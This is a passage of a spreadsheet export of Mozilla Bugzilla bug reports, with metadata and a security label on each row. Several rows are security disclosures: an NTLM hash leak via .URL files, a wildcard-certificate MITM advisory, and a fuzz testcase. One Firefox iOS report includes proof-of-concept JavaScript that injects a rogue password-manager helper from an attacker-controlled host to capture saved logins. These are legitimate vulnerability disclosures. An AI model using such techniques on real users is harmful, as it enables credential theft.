        <v>5</v>
      </c>
      <c r="W907" t="inlineStr">
        <is>
          <t>Created attachment 9314015
Untitled_ Jan 25, 2023 10_57 PM.webm
On Windows, .URL file can also send NTLM hashes via the IconFile parameter. Thus it is possible to reproduce https://bugzilla.mozilla.org/show_bug.cgi?id=1773894 using .URL file</t>
        </is>
      </c>
      <c r="X907" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="908">
      <c r="A908" t="n">
        <v>738841</v>
      </c>
      <c r="B908" t="inlineStr">
        <is>
          <t>2012-03-23 16:05:08 -0700</t>
        </is>
      </c>
      <c r="C908" t="inlineStr">
        <is>
          <t>"Assertion failure: allocated()," with TypeInference disabled</t>
        </is>
      </c>
      <c r="D908" t="inlineStr">
        <is>
          <t>2013-01-14 08:03:13 -0800</t>
        </is>
      </c>
      <c r="E908" t="n">
        <v>1</v>
      </c>
      <c r="F908" t="n">
        <v>1</v>
      </c>
      <c r="G908" t="n">
        <v>3</v>
      </c>
      <c r="H908" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I908" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J908" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K908" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L908" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M908" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N908" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O908" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P908" t="inlineStr">
        <is>
          <t>[sg:moderate][advisory-tracking+] js-triage-needed</t>
        </is>
      </c>
      <c r="Q908" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R908" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S908" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T908" t="n">
        <v>1</v>
      </c>
      <c r="U908" t="n">
        <v>0</v>
      </c>
      <c r="V908" t="n">
        <v>10</v>
      </c>
      <c r="W908" t="inlineStr">
        <is>
          <t>Created attachment 608898
stack
try {
    for (let z = 0; z &lt; 1; ++evalcx("[]", newGlobal("new-compartment"))) {}
} catch (e) {}
try {
    for (y in [schedulegc(58)]) {
        b
    }
} catch (e) {}
try {
    e
} catch (e) {}
try {
    (function() {
        h
    }())
} catch (e) {}
try {
    (function() {
        this.m.f = function() {}
    }())
} catch (e) {}
try {
    t()
} catch (e) {}
try {
    p
} catch (e) {}
try {
    gc()
    p
} catch (e) {}
try {
    (function() {
        for (var v of m) {}
    }())
} catch (e) {}
try {
    m
} catch (e) {}
try {
    (function() {
        {
            print(new function(q)("", s))
            let u
        }
    }())
} catch (e) {}
asserts 64-bit js debug shell on m-c changeset 6470fe2fc4de with -m and -a at Assertion failure: allocated(),
Setting s-s because gc is on the stack.
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   87736:fbef6a165cf8
user:        Bill McCloskey
date:        Fri Feb 10 18:32:08 2012 -0800
summary:     Bug 723313 - Stop using conservative stack scanner for VM stack marking (r=luke,bhackett)</t>
        </is>
      </c>
      <c r="X908" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="909">
      <c r="A909" t="n">
        <v>285533</v>
      </c>
      <c r="B909" t="inlineStr">
        <is>
          <t>2005-03-09 19:33:26 -0800</t>
        </is>
      </c>
      <c r="C909" t="inlineStr">
        <is>
          <t>Bugzilla displays inactive enum values</t>
        </is>
      </c>
      <c r="D909" t="inlineStr">
        <is>
          <t>2005-04-11 18:28:35 -0700</t>
        </is>
      </c>
      <c r="E909" t="n">
        <v>1</v>
      </c>
      <c r="F909" t="n">
        <v>1</v>
      </c>
      <c r="G909" t="n">
        <v>4</v>
      </c>
      <c r="H909" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I909" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J909" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K909" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L909" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M909" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N909" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O909" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P909" t="inlineStr"/>
      <c r="Q909" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R909" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S909" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T909" t="n">
        <v>1</v>
      </c>
      <c r="U909" t="n">
        <v>0</v>
      </c>
      <c r="V909" t="n">
        <v>5</v>
      </c>
      <c r="W909" t="inlineStr">
        <is>
          <t>Oh, I knew I might run into this. :-( I should have taken isactive out of the
enum stuff.
Ah, well. At the moment, Bugzilla displays values for enums even if isactive =
0. It shouldn't do that. You'll only see this on a brand-new install, where the
"---" values are inactive.</t>
        </is>
      </c>
      <c r="X909" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="910">
      <c r="A910" t="n">
        <v>618700</v>
      </c>
      <c r="B910" t="inlineStr">
        <is>
          <t>2010-12-12 09:03:30 -0800</t>
        </is>
      </c>
      <c r="C910" t="inlineStr">
        <is>
          <t>Adjust timeout of patcher_build_tools step in ReleaseUpdatesFactory</t>
        </is>
      </c>
      <c r="D910" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E910" t="n">
        <v>1</v>
      </c>
      <c r="F910" t="n">
        <v>1</v>
      </c>
      <c r="G910" t="n">
        <v>5</v>
      </c>
      <c r="H910" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I910" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J910" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K910" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L910" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M910" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N910" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O910" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P910" t="inlineStr">
        <is>
          <t>[releases][automation][simple]</t>
        </is>
      </c>
      <c r="Q910" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R910" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S910" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T910" t="n">
        <v>1</v>
      </c>
      <c r="U910" t="n">
        <v>0</v>
      </c>
      <c r="V910" t="n">
        <v>3</v>
      </c>
      <c r="W910" t="inlineStr">
        <is>
          <t>Created attachment 497155
sync the timeouts
At the moment patcher_build_tools runs "perl patcher2.pl --build-tools-hg..." which tries to clone the repository with internal timeout set to 3600, while buildbot uses default timout (1200). During this operation nothing is being printed to stdout and sometimes this operation fails. It would be better to synchronize timeouts.</t>
        </is>
      </c>
      <c r="X910" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="911">
      <c r="A911" t="n">
        <v>578697</v>
      </c>
      <c r="B911" t="inlineStr">
        <is>
          <t>2010-07-14 10:00:08 -0700</t>
        </is>
      </c>
      <c r="C911" t="inlineStr">
        <is>
          <t>Browser Wildcard Certificate Validation Issue</t>
        </is>
      </c>
      <c r="D911" t="inlineStr">
        <is>
          <t>2010-11-11 14:10:37 -0800</t>
        </is>
      </c>
      <c r="E911" t="n">
        <v>1</v>
      </c>
      <c r="F911" t="n">
        <v>1</v>
      </c>
      <c r="G911" t="n">
        <v>3</v>
      </c>
      <c r="H911" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I911" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J911" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K911" t="inlineStr">
        <is>
          <t>3.12.6</t>
        </is>
      </c>
      <c r="L911" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M911" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N911" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O911" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P911" t="inlineStr">
        <is>
          <t>[sg:moderate] cross-browser, coordinate disclosure</t>
        </is>
      </c>
      <c r="Q911" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R911" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S911" t="inlineStr">
        <is>
          <t>3.12.8</t>
        </is>
      </c>
      <c r="T911" t="n">
        <v>1</v>
      </c>
      <c r="U911" t="n">
        <v>0</v>
      </c>
      <c r="V911" t="n">
        <v>47</v>
      </c>
      <c r="W911" t="inlineStr">
        <is>
          <t>Not yet certain if this is an NSS issue or PSM issue.  Maybe both?
I'm intentionally giving this bug a higher severity than it probably 
deserves, given that CAs trusted by Mozilla won't issue such certs.
Received an email today from Richard Moore &lt;rich@kde.org&gt;.  Text as follows:
&gt; This is an advance notification of an advisory my company will be
&gt; releasing at some point in the future. We aim to work with vendors to
&gt; achieve simultaneous disclosure, so any comments would be appreciated.
&gt; Once I've dug out the various security contacts for the browsers
&gt; concerned we will notify them privately as well. Please treat this
&gt; information as confidential for now.
&gt; Westpoint Security Advisory
&gt; ---------------------------
&gt; 
&gt; Title:        Multiple Browser Wildcard Cerficate Validation Weakness
&gt; Risk Rating:  Low
&gt; Author:       Richard Moore &lt;rich@westpoint.ltd.uk&gt;
&gt; Test Cases:   Simon Ward &lt;simon@westpoint.ltd.uk&gt;
&gt; Date:         14 July 2010
&gt; Advisory ID#: wp-10-0001
&gt; URL:          http://www.westpoint.ltd.uk/advisories/wp-10-0001.txt
&gt; CVE:          not yet assigned
&gt; 
&gt; Details
&gt; -------
&gt; 
&gt; RFC 2818 covers the requirements for matching CNs and subjectAltNames in
&gt; order to establish valid SSL connections. It first discusses CNs that are
&gt; for hostnames, and the rules for wildcards in this case. The next paragraph
&gt; in the RFC then discusses CNs that are IP addresses:
&gt; 
&gt; 'In some cases, the URI is specified as an IP address rather than a
&gt; hostname. In this case, the iPAddress subjectAltName must be present
&gt; in the certificate and must exactly match the IP in the URI.'
&gt; 
&gt; The intention of the RFC is clearly that you should not be able to use
&gt; wildcards with IP addresses (in order to avoid the ability to perform
&gt; man-in-the-middle attacks). Unfortunately our testing showed that this
&gt; rule is not adhered to by some browsers.
&gt; 
&gt; We created a certificate with the CN '*.168.3.48' this meets the various
&gt; rules for wildcards in CNs, but should be treated as invalid since it is
&gt; not a hostname. We then observed the errors reported by browsers when
&gt; connecting to an https server using this certificate run on IP address
&gt; 192.168.3.48.
&gt; 
&gt; We imported the test CA used to sign the certifcate in order to perform
&gt; the test.
&gt; 
&gt; The results we saw were as follows:
&gt; 
&gt; IE6     
&gt;         Regarded the IP address as matching the CN (VULNERABLE)
&gt;         
&gt; IE7     
&gt;         Regarded the IP address as matching the CN (VULNERABLE)
&gt; 
&gt; Firefox 3.6.6
&gt;         Regarded the IP address as matching the CN (VULNERABLE)
&gt;         
&gt; Chrome  
&gt;         Regarded the IP address as matching the CN (VULNERABLE)
&gt;         
&gt; Opera   
&gt;         Regarded the IP address did not match the CN (NOT VULNERABLE)
&gt; 
&gt; Mitigating Factors
&gt; ------------------
&gt; 
&gt; Obviously a good CA should refuse to issue a certificate with the CN as
&gt; indicated, however there only need be one CA to issue one in error for
&gt; this issue to result in the user getting no warning at all and being
&gt; vulnerable to MITM.
&gt; 
&gt; The rules for hostname matching mean that only the first octet of the
&gt; IP address can contain a wildcard. This means that you must be able to
&gt; control a server that matches the remainder of the IP address of your
&gt; target which reduces the risk of this attack being used dramatically.
&gt; 
&gt; Impact
&gt; ------
&gt; 
&gt; If exploited then a MITM attack can be performed allowing the guarantees
&gt; SSL provides to be circumvented.
&gt; 
&gt; Timeline
&gt; --------
&gt; 
&gt; 14 July 2010    Limited disclosure to browser developers.</t>
        </is>
      </c>
      <c r="X911" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="912">
      <c r="A912" t="n">
        <v>652829</v>
      </c>
      <c r="B912" t="inlineStr">
        <is>
          <t>2011-04-26 09:23:29 -0700</t>
        </is>
      </c>
      <c r="C912" t="inlineStr">
        <is>
          <t>crash marked as duplicate of itself. need to identify leader crash.</t>
        </is>
      </c>
      <c r="D912" t="inlineStr">
        <is>
          <t>2016-08-05 09:41:15 -0700</t>
        </is>
      </c>
      <c r="E912" t="n">
        <v>1</v>
      </c>
      <c r="F912" t="n">
        <v>1</v>
      </c>
      <c r="G912" t="n">
        <v>4</v>
      </c>
      <c r="H912" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I912" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J912" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K912" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L912" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M912" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N912" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O912" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P912" t="inlineStr"/>
      <c r="Q912" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R912" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S912" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T912" t="n">
        <v>1</v>
      </c>
      <c r="U912" t="n">
        <v>0</v>
      </c>
      <c r="V912" t="n">
        <v>18</v>
      </c>
      <c r="W912" t="inlineStr">
        <is>
          <t>From IRC yesterday:
&lt;marcia&gt; https://crash-stats.mozilla.com/report/list?range_value=7&amp;range_unit=days&amp;date=2011-04-25%2011%3A00%3A00&amp;signature=nsVariant%3A%3ASetAsInt64%28__int64%29&amp;version=Firefox%3A6.0a1 is odd since all the reports are marked as dup
Looking through those, I found that https://crash-stats.mozilla.com/report/8007e3fc-fa7d-43ae-b476-064532110424 (which they're all duped to) seems to be marked a duplicate of itself, which looks strange.
As a small UI nit, I saw that the links on the "dup" are slightly different then the links in the "Date" column, meaning that the browser doesn't mark the already visited report as its link differs (Date column goes to /report/index/ while Dup column goes to /report/ instead). Should I file an extra bug on that?</t>
        </is>
      </c>
      <c r="X912" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="913">
      <c r="A913" t="n">
        <v>82595</v>
      </c>
      <c r="B913" t="inlineStr">
        <is>
          <t>2001-05-24 12:54:04 -0700</t>
        </is>
      </c>
      <c r="C913" t="inlineStr">
        <is>
          <t>message thread causes infinite loop, crash Trunk [@ ntdll.dll - morkTable::NewTableRowCursor][@ MSVCRT.dll - morkNode::CutWeakRef]</t>
        </is>
      </c>
      <c r="D913" t="inlineStr">
        <is>
          <t>2012-06-20 03:06:57 -0700</t>
        </is>
      </c>
      <c r="E913" t="n">
        <v>1</v>
      </c>
      <c r="F913" t="n">
        <v>1</v>
      </c>
      <c r="G913" t="n">
        <v>3</v>
      </c>
      <c r="H913" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I913" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J913" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K913" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L913" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M913" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N913" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O913" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P913" t="inlineStr">
        <is>
          <t>[nsbeta1+] fix in hand , got reviews, will check in tonight if tree opens</t>
        </is>
      </c>
      <c r="Q913" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R913" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S913" t="inlineStr">
        <is>
          <t>mozilla0.9.1</t>
        </is>
      </c>
      <c r="T913" t="n">
        <v>1</v>
      </c>
      <c r="U913" t="n">
        <v>0</v>
      </c>
      <c r="V913" t="n">
        <v>50</v>
      </c>
      <c r="W913" t="inlineStr">
        <is>
          <t>**** observed with 2001-05-24 build ****
Steps to reproduce:
- select a newsgroup with more than 500 messages;
- observe crash while download
//note: the dlgbox that prompts you to select to download all headers or just 
500 messages doesn't pop up
stack to follow</t>
        </is>
      </c>
      <c r="X913" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="914">
      <c r="A914" t="n">
        <v>1654131</v>
      </c>
      <c r="B914" t="inlineStr">
        <is>
          <t>2020-07-20 17:59:16 -0700</t>
        </is>
      </c>
      <c r="C914" t="inlineStr">
        <is>
          <t>Rogue LoginsHelper (password manager) can be injected by untrusted web contents</t>
        </is>
      </c>
      <c r="D914" t="inlineStr">
        <is>
          <t>2024-05-30 10:16:51 -0700</t>
        </is>
      </c>
      <c r="E914" t="n">
        <v>1</v>
      </c>
      <c r="F914" t="n">
        <v>1</v>
      </c>
      <c r="G914" t="n">
        <v>2</v>
      </c>
      <c r="H914" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I914" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J914" t="inlineStr">
        <is>
          <t>Login Management</t>
        </is>
      </c>
      <c r="K914" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L914" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M914" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N914" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O914" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P914" t="inlineStr">
        <is>
          <t>[sec-survey]</t>
        </is>
      </c>
      <c r="Q914" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R914" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S914" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T914" t="n">
        <v>1</v>
      </c>
      <c r="U914" t="n">
        <v>0</v>
      </c>
      <c r="V914" t="n">
        <v>8</v>
      </c>
      <c r="W914" t="inlineStr">
        <is>
          <t>Created attachment 9164918
Demonstrate password stealing attack
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15
Steps to reproduce:
Any web content can define rogue LoginsHelper (window.__firefox__.logins).
That can be abused for large-scale attacks by injecting malicious ad script to the page for stealing user's IDs and passwords.
(1) Victim visits http://csrf.jp/2020/form.html
(2) Victim enters (any) ID and password and login
(3) Login helper shows the snackbar to ask Victim to save the credentials, then Victim choose "Save Login"
(4) Victim clicks a link that goes to http://csrf.jp/2020/anywhere.html
(5) The above page (anywhere.html) has no HTML form and load Bad Ad script from http://mallory.csrf.jp/2020/bad_ad.js
(6) Bad Ad script defines window.__firefox__,logins object that steals IDs and passwords that were sent from LoginsHelper.swift
(7) All of the user's IDs and passwords are stolen by Bad Ad (see attached video for demonstration).
Actual results:
The reason why legitimate LoginsHelper is overridden is that LoginsHelper.js is injected at the timing of AtDocumentEnd.
https://github.com/mozilla-mobile/firefox-ios/blob/76faae8c6c94e22c8fbc0de72e2d06f615738e2c/Client/Frontend/UserContent/UserScripts/AllFrames/AtDocumentEnd/LoginsHelper.js#L10
WKWebView's JS hook lifecycle is below.
[1] AtDocumentStart -&gt; [2] Load web document -&gt; [3] AtDocumentEnd
In anywhere.html at (4), the page loads a mallicious ad script that contains exploit code.
```
&lt;!-- Ad --&gt;
&lt;script src="//mallory.csrf.jp/2020/bad_ad.js"&gt;&lt;/script&gt;
```
In bad_ad.js at (6) define the mallicius LoginHelper as an immutable object at [2]. So the setting of legitimate helper at [3] is rejected.
```
function LoginInjector() {
  this.inject = function(msg) {
    // Steal password here
    alert("Hi victim! We got your passwords!");
    alert(JSON.stringify(msg));
  };
}
Object.defineProperty(window.__firefox__, "logins", {
  enumerable: false,
  configurable: false,
  writable: false,
  value: Object.freeze(new LoginInjector())
});
```
Expected results:
The legitimate LoginsHelper (window.__firefox__.logins) should be set at [1] AtDocumentStart.
If not possible, try to detect whether other helper is already set before, and not filling the ID and password in polluted pages.</t>
        </is>
      </c>
      <c r="X914" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="915">
      <c r="A915" t="n">
        <v>1615589</v>
      </c>
      <c r="B915" t="inlineStr">
        <is>
          <t>2020-02-14 05:09:11 -0800</t>
        </is>
      </c>
      <c r="C915" t="inlineStr">
        <is>
          <t>Add Arabic to onchange l10n changesets to break try on more unicode problems</t>
        </is>
      </c>
      <c r="D915" t="inlineStr">
        <is>
          <t>2021-09-22 03:47:20 -0700</t>
        </is>
      </c>
      <c r="E915" t="n">
        <v>1</v>
      </c>
      <c r="F915" t="n">
        <v>1</v>
      </c>
      <c r="G915" t="n">
        <v>7</v>
      </c>
      <c r="H915" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I915" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J915" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K915" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L915" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M915" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N915" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O915" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P915" t="inlineStr"/>
      <c r="Q915" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R915" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S915" t="inlineStr">
        <is>
          <t>mozilla75</t>
        </is>
      </c>
      <c r="T915" t="n">
        <v>1</v>
      </c>
      <c r="U915" t="n">
        <v>0</v>
      </c>
      <c r="V915" t="n">
        <v>5</v>
      </c>
      <c r="W915" t="inlineStr">
        <is>
          <t>We're seeing multiple tree bustages around l10n and unicode data with trying to convert python build foo to python3.
Let's add `ar` to the tested locales, as it has unicode metadata.</t>
        </is>
      </c>
      <c r="X915" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="916">
      <c r="A916" t="n">
        <v>492779</v>
      </c>
      <c r="B916" t="inlineStr">
        <is>
          <t>2009-05-13 10:27:45 -0700</t>
        </is>
      </c>
      <c r="C916" t="inlineStr">
        <is>
          <t>PL_Base64Decode integer overflow</t>
        </is>
      </c>
      <c r="D916" t="inlineStr">
        <is>
          <t>2010-03-17 19:09:03 -0700</t>
        </is>
      </c>
      <c r="E916" t="n">
        <v>1</v>
      </c>
      <c r="F916" t="n">
        <v>1</v>
      </c>
      <c r="G916" t="n">
        <v>3</v>
      </c>
      <c r="H916" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I916" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J916" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K916" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L916" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M916" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N916" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O916" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P916" t="inlineStr">
        <is>
          <t>[sg:critical?] impractical attack? [4.7.5] [mostly fixed in 4.8]</t>
        </is>
      </c>
      <c r="Q916" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R916" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S916" t="inlineStr">
        <is>
          <t>4.8.1</t>
        </is>
      </c>
      <c r="T916" t="n">
        <v>1</v>
      </c>
      <c r="U916" t="n">
        <v>0</v>
      </c>
      <c r="V916" t="n">
        <v>44</v>
      </c>
      <c r="W916" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)
PL_Base64Deconde in nsprpub/lib/libc/src/base64.c appears to suffer from an integer overflow issue while determine the size of the dest buffer.
I only spent a small amount of time trying to determine if it was possible to trigger this, but with no success.  I've since discarded it from my list of bugs to investigate but wanted to pass it on.  Since PL_Base64Decode is used in several locations it may be possible for a remote attacker to trigger the overflow. Once the overflow is triggered it would be a rather simple bug to exploit since an attacker can control the exact amount of data to overflow the buffer with by using invalid base64 characters to no op the decoding.
If you feel it is not possible to trigger the integer overflow, then please just fix the code and call it a potential bug. I labeled it as a security bug because someone with more knowledge of your code might see things I do not.
Reproducible: Couldn't Reproduce
Steps to Reproduce:
1. Use one of the many callers to PL_Base64Decode and pass a string large enough to overflow the size of the dest
2.
3.
Most likely would only be exploitable on high end computers.</t>
        </is>
      </c>
      <c r="X916" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="917">
      <c r="A917" t="n">
        <v>1086999</v>
      </c>
      <c r="B917" t="inlineStr">
        <is>
          <t>2014-10-21 15:02:40 -0700</t>
        </is>
      </c>
      <c r="C917" t="inlineStr">
        <is>
          <t>CSP: Asterisk (*) wildcard should not allow blob:, data:, or filesystem: when matching source expressions</t>
        </is>
      </c>
      <c r="D917" t="inlineStr">
        <is>
          <t>2015-08-15 17:58:20 -0700</t>
        </is>
      </c>
      <c r="E917" t="n">
        <v>1</v>
      </c>
      <c r="F917" t="n">
        <v>1</v>
      </c>
      <c r="G917" t="n">
        <v>3</v>
      </c>
      <c r="H917" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I917" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J917" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K917" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L917" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M917" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N917" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O917" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P917" t="inlineStr">
        <is>
          <t>[adv-main40+]</t>
        </is>
      </c>
      <c r="Q917" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R917" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S917" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T917" t="n">
        <v>1</v>
      </c>
      <c r="U917" t="n">
        <v>0</v>
      </c>
      <c r="V917" t="n">
        <v>38</v>
      </c>
      <c r="W917" t="inlineStr">
        <is>
          <t>There is a discrepancy in our CSP implementation and the spec. The spec says [1] that blob:, data:, and filesystem: should be excluded in case of a wildcard (allow all) when matching source expressions.
Currently we allow all schemes in case of an asterisk wildcard, e.g. here: [2].
We should update our implementation to follow the spec.
[1] http://www.w3.org/TR/CSP11/#match-source-expression
[2] http://mxr.mozilla.org/mozilla-central/source/content/base/src/nsCSPUtils.cpp#291</t>
        </is>
      </c>
      <c r="X917" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="918">
      <c r="A918" t="n">
        <v>1119019</v>
      </c>
      <c r="B918" t="inlineStr">
        <is>
          <t>2015-01-07 15:45:40 -0800</t>
        </is>
      </c>
      <c r="C918" t="inlineStr">
        <is>
          <t>crash in mozilla::layers::SharedSurfaceTextureHost::Lock()</t>
        </is>
      </c>
      <c r="D918" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:24 -0700</t>
        </is>
      </c>
      <c r="E918" t="n">
        <v>1</v>
      </c>
      <c r="F918" t="n">
        <v>1</v>
      </c>
      <c r="G918" t="n">
        <v>3</v>
      </c>
      <c r="H918" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I918" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J918" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
